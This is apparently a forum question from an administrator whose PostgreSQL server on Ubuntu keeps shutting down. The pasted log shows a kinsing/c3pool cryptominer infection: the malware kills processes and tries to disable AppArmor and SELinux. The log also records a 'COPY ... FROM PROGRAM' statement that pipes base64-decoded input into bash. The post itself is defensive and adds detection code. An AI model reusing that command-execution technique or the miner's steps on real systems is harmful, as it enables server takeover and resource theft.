<分区>
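Over the past two days, my Postgres database server has shut down unexpectedly five or six times, usually when server traffic was at its lowest. So I checked the PostgreSQL log: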
2021-09-18 10:17:36.099 GMT [22856] LOG: received smart shutdown request
2021-09-18 10:17:36.111 GMT [22856] LOG: background worker "logical replication launcher" (PID 22863) exited with exit code 1
grep: Trailing backslash
kill: (28): Operation not permitted
2021-09-18 10:17:39.601 GMT [55614] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.603 GMT [55622] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.686 GMT [55635] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.688 GMT [55636] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.718 GMT [55642] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.720 GMT [55643] XXX@XXX FATAL: the database system is shutting down
kill: (55736): No such process
kill: (55741): No such process
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Failed to stop c3pool_miner.service: Interactive authentication required.
See system logs and 'systemctl status c3pool_miner.service' for details.
pkill: killing pid 654 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
bash: line 525: docker: command not found
bash: line 526: docker: command not found
bash: line 527: docker: command not found
bash: line 528: docker: command not found
bash: line 529: docker: command not found
bash: line 530: docker: command not found
bash: line 531: docker: command not found
bash: line 532: docker: command not found
bash: line 533: docker: command not found
bash: line 534: docker: command not found
bash: line 547: setenforce: command not found
bash: line 548: /etc/selinux/config: Permission denied
Failed to stop apparmor.service: Interactive authentication required.
See system logs and 'systemctl status apparmor.service' for details.
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Failed to reload daemon: Interactive authentication required.
update-rc.d: error: Permission denied
Failed to stop aliyun.service.service: Interactive authentication required.
See system logs and 'systemctl status aliyun.service.service' for details.
Failed to disable unit: Interactive authentication required.
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
2021-09-18 10:17:49.860 GMT [54832] admin@postgres FATAL: terminating connection due to administrator command
2021-09-18 10:17:49.860 GMT [54832] admin@postgres CONTEXT: COPY uegplqsl, line 1: "/tmp/kinsing exists"
2021-09-18 10:17:49.860 GMT [54832] admin@postgres STATEMENT: DROP TABLE IF EXISTS XXX;CREATE TABLE XXX(cmd_output text);COPY XXXFROM PROGRAM 'echo ... |base64 -d|bash';SELECT * FROM XXX;DROP TABLE IF EXISTS XXX;
2021-09-18 10:17:49.877 GMT [22858] LOG: shutting down
2021-09-18 10:17:49.907 GMT [22856] LOG: database system is shut down
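One line in this log stands out to me: the STATEMENT entry shows a `COPY ... FROM PROGRAM` command that pipes base64-decoded text into bash, run as `admin@postgres`. To check whether the same pattern appears before the other shutdowns, a small scan of the log could look like the sketch below. The function name `find_copy_program` and the regular expression are my own assumptions, not part of any PostgreSQL tooling, and the pattern is deliberately loose so that it also matches the redacted `COPY XXXFROM PROGRAM` form seen above.

```python
import re

# Loose pattern: the word COPY, then anything, then "FROM PROGRAM".
# No word boundary before FROM, so the redacted "XXXFROM" form also matches.
COPY_PROGRAM = re.compile(r"\bCOPY\b.*?FROM\s+PROGRAM\b", re.IGNORECASE)


def find_copy_program(lines):
    """Return (line_number, text) pairs for lines that contain COPY ... FROM PROGRAM."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if COPY_PROGRAM.search(line):
            hits.append((number, line.rstrip("\n")))
    return hits
```

It can be fed an open log file, for example `find_copy_program(open(path))`, where `path` is wherever the server log lives on the machine in question.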
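I learned that this could be caused by another process sending a SIGTERM, SIGINT, or SIGQUIT signal to the database server, so I used SystemTap to capture any signal that shuts the database server down. After PostgreSQL shut down again, I got this:
Now I have the PIDs of the processes that send the shutdown signal. What can I do to prevent this from happening again?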
The VPS operating system is Ubuntu 20.04.3 LTS. The backend is written in Django and the database is PostgreSQL 12.
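For reference, the three signals I mentioned map to PostgreSQL's three shutdown modes: SIGTERM requests a smart shutdown, SIGINT a fast shutdown, and SIGQUIT an immediate shutdown. The first log line, "received smart shutdown request", therefore points to SIGTERM. A minimal sketch of that mapping is below; the helper name `signal_for_log_line` is hypothetical, and the code assumes a Unix-like system where `signal.SIGQUIT` is defined.

```python
import re
import signal

# Shutdown mode named in the server log -> signal that requests that mode.
SHUTDOWN_MODE_TO_SIGNAL = {
    "smart": signal.SIGTERM,
    "fast": signal.SIGINT,
    "immediate": signal.SIGQUIT,
}

SHUTDOWN_REQUEST = re.compile(r"received (smart|fast|immediate) shutdown request")


def signal_for_log_line(line):
    """Return the signal implied by a 'received ... shutdown request' line, or None."""
    match = SHUTDOWN_REQUEST.search(line)
    if match is None:
        return None
    return SHUTDOWN_MODE_TO_SIGNAL[match.group(1)]
```

Applied to the first line of my log, this returns `signal.SIGTERM`, so the signal trace only needs to watch for that one signal.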